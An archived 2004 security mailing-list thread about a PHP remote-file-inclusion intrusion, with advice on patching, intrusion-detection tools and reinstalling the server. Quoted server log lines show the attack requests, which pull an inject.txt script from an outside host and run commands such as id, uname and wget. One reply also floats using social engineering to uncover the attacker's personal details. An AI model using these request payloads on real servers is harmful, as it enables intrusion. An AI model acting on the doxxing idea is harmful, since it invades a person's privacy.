[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Hack attempt
Hi Norbert/Alvin
As I already explained in private to Norbert, this is just a guy of DALnet
Network playing with some exploit for PHP. Infact he installed eggdrop and
psybnc which are not related to clones attack at all. He's probably just a
kid with some automated script or some "l33t" tool to own unpatched boxes.
Anyway why taking off wget and other useful binaries? I would suggest
instead of fully patching your box and to maybe install Snort.
I don't agree with the "smart people investigating for what's cooking". I
think chkrootkit can help and can spare lot of time. Of course you
shouldn't base your Security on this software only but it's a good help.
Snort and Tripwire are definetively a good help too.
As I said, it's not a clones derivated attack. It's just a chatting kid who
probably is trying to build up his own Botnet to look l33t with his mates.
Again I don't agree with the "another cracked box". Infact the whois made
by Norbert on my suggestion, gave good results. The provider hosting his
website (yes, that is his own personal website.... not very smart eh?!) has
deleted the inject.txt script and gave a warning to this guy who will be
probably scared to death (this depends on how old he is and other factors).
Moreover we know his Nickname and we know he's chatting on Dalnet so....
some social engeneering could even lead to personal information on this
kid.
Anyway... Norbert patch your box on any PHP bug (there are tons of PHP bug
as far as I know) and then try to use SATAN or NESSUS to check your box (I
personally suggest Nessus). Oh... just one last but not least thing:
don't forget to wipe your box 'cause you will never know what he did for
real so it's much safer to reinstall everything. I know it's boring but
it's the only SECURE way to know your box is clean.
Hope this can help others with same problem.
Ciao
Marco Monicelli
MARCEGAGLIA SPA
Automotive Sales Department
Stainless Steel Division
Tel. +39 0376 685369
Fax. +39 0376 685625
email: marco.monicelli@marcegaglia.com
Alvin Oga
<alvin.sec@Virtual.Linux-Cons To: norbert.crettol@idiap.ch (Norbert Crettol)
ulting.com> cc: focus-linux@securityfocus.com
Subject: Re: Hack attempt
23/07/2004 01.23
hi norbert
> "GET /<some
script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0"
200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
time for you to patch and update to latest php
or better still, turn it off esp if you don't need it
tons of things to fix up ... to harden the server
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
time to remove wget, lynx, and equiv apps
> Has someone seen this kind of attack ?
it's either eggdrop or modified clones/derivatives
> (chkrootkit doesn't detect it).
so much for chkrootkit :-)
smart/intelligent people investigating for "whats cooking" is better
than automated tools
> Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ?
> Is there a way to stop this guy ? His nickname (CaEm) appears in the
> the uploaded scripts.
probably another cracked box ... long list to follow to find the
actual cracker
c ya
alvin